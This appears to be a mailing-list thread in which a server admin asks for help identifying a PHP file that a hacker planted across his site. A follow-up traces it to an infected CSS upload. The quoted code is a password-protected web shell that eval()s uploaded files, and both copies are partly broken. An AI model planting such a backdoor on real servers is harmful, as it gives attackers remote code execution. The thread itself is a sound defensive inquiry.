Progress. One of our designers uploaded an infected css file for his application. Thus every time
the file is called, it's executed. the The code appears to be md5 encoded. I'm going reverse the
coding to see what it does.
Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone help
me figure out what's the purpose of this code. The hack places this
file in numerous dirs on the site, I assume using a php script because
the owner is "nobody".
I can sort of figure what is doing; but, I can't figure out what the
hacker is using it for.
Incidentally, I've changed all passwords and restricted ftp to two
people. I see no sign that any code is written with by site owner, i.e,
ftp. And, I've looked carefully for suspect php files.
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) {
echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>"; testdata('start'); if
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
testdata('end'); echo "</pre>"; ?>
<?php error_reporting(1);
function say($t)
echo "$t\n";
} ;
function testdata($t)
} ;
echo "<pre>";
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],
"rb"), $HTTP_POST_FILES["f"]["size"]))
} else
} ;
} else
} ;
echo "</pre>";
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